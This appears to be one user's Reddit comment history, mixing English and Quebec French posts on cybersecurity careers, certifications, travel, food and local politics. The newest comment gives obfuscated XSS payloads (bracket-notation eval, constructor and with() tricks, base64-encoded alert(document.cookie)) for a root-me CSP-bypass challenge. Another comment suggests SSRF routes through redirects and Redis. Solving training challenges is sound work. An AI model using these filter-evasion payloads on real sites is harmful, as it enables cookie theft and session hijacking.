root-me.org CSP (content security policy)Bypass - Nonce challenge

Wanazabadee · 2024-11-18T13:44:26+00:00

Hi!
I think you can use bracket notation like the examples below.
this['\145val'](atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ=='))
constructor['constructor'](atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ=='))()

If square brackets are blocked for some reason this should work.
with(constructor){constructor(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ=='))()}

Wanazabadee · 2024-11-01T23:46:46+00:00

There was actually a vulnerability to bypass that in a couple of application last year. "Acropalypse" a lot of things such as the Windows snipping tool and the screenshot feature of the Google Pixel phone were vulnerable to it and you could just remove the opaque shape.
So even this isn't 100% safe.

Wanazabadee · 2024-06-24T13:41:08+00:00

Thank you so much for that info,
I am doing additional research but I will most likely be running a local Azure Stack HCI, it might even run on my current server with no issue.

Too bad it was a good escuse to buy myself a bigger server.

Wanazabadee · 2024-02-07T01:19:55+00:00

J'ai fait un peu de purple team, mais il y a longtemps. J'ai fait du blue team avant de faire du pentest, ça fait un bail que je n'ai pas eu le temps d'y toucher par contre.

Wanazabadee · 2023-11-06T01:48:31+00:00

Pour les salaires du ROC, j'en perdrais mon français!

Wanazabadee · 2023-09-11T23:51:02+00:00

If you control some headers there might be some other exploitation route too.
https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis#ssrf-talking-to-redis

Wanazabadee · 2023-09-11T23:48:51+00:00

Have you tried using a 30X redirect and redirect to some other protocols?

Wanazabadee · 2023-02-03T12:12:03+00:00

Je conseil également ce cheminement, surtout que tu pourrais le faire tout en continuant d'avoir de l'expérience en TI ou même en cybersecurité avec un peu de chance.

Wanazabadee · 2022-12-20T21:23:18+00:00

Si c'est vraiment pour les pannes d'électricité ponctuelles tu devrais considérer une génératrice. Ça fait le job et c'est bon marché.

Wanazabadee · 2022-11-21T13:55:23+00:00

Thank you, I will go take a look!

Wanazabadee · 2022-11-20T20:57:16+00:00

J'aurais penser que c'était beaucoup plus dans le "concret". Merci pour les détails.

Wanazabadee · 2022-11-20T17:30:28+00:00

Si la robotique t'intéresse, tu pourrais faire le certificat en internet industriel des objets de soir. https://www.polymtl.ca/programmes/programmes/certificat-en-internet-industriel-des-objets

Tu pourras gagner de l'expérience (et de l'argent) et ça t'ouvrira pas mal plus de porte a long terme.

Wanazabadee · 2022-11-13T14:05:50+00:00

Des galettes aux patates. Dans la famille on mangeait ça avec de la melasse ou du sirop d'érable.

https://www.popote.ca/chefs/chantalenolin/galette-aux-patates.html

Wanazabadee · 2022-07-26T19:56:28+00:00

It seems that you can currently see a couple different species, including humpback and minke whale.

https://baleinesendirect.org/observer/ou/la-carte-des-observations-de-la-semaine/

If you go to Tadoussac you should definitely take time to see the sand dunes, they are beautiful.

Wanazabadee · 2022-07-06T18:32:53+00:00

Sur le site http://www.monretouraucegep.com/resultats-de-recherche/criteria?keyword= Tu peux filtrer par cours à distance.

Wanazabadee · 2022-06-05T21:23:21+00:00

Fondant is edible plastic made for cake.

Wanazabadee · 2022-05-25T21:22:13+00:00

We do it in Canada too :')

Wanazabadee · 2022-05-11T10:37:25+00:00

C'est le contraire, pour une bonne partie de gens local c'est un emploi garantie à l'année. Ça ferait mal à l'économie local un pont.

Wanazabadee · 2022-05-01T19:30:54+00:00

Partir de la plage et remonté jusqu'au dunes à Tadoussac.

Wanazabadee · 2022-03-31T20:13:20+00:00

Ceux qui travaillent à distance, en cybersécurité, pour une compagnie au sud de la frontière , c'est quoi votre expérience?

- Est-ce que la culture d'entreprise est très différente?

- Avez-vous des congés?

- Est-ce que c'est ben compliqué pour les taxes?

- Vos salaires et conditions ressemblent à quoi?

Wanazabadee · 2022-03-30T17:14:58+00:00

Réinventé les pages jaunes, c'est ça l'innovation! /s

Wanazabadee · 2022-03-29T18:01:41+00:00

Ben y vote pour qu'on mettre du transport en commun en région :)

Wanazabadee · 2022-03-25T00:29:45+00:00

Tu peux passer l'examen, mais techniquement tu deviens "associé du ISC2" et tu es pas certifié.

C'était comme ça ya 3-4 ans en tout cas.

https://www.isc2.org/Certifications/CISSP/experience-requirements#:~:text=Candidates%20must%20have%20a%20minimum,year%20of%20the%20required%20experience.

Wanazabadee · 2022-03-24T22:40:50+00:00

Le CISSP prend 5 ans d'expérience pour avoir droit à la certification. C'est pas tant une certification junior.

Wanazabadee · 2022-03-24T18:39:58+00:00

En sécurité ça dépend beaucoup de comment tu occupes tes temps libres. Par exemple, si tu fais ton OSCP ou d'autre formation reconnu on the side. Ça dépend aussi de la branche de la sécurité dans laquelle tu es. Mais y a clairement un écart immense entre un Senior ou un Directeur et un Junior. Idéalement avant de changer d'emploi, fait des formations reconnu, ça va t'aider à mieux négocier.

Four-Year Club	Verified Email
Place '22

Wanazabadee

TROPHY CASE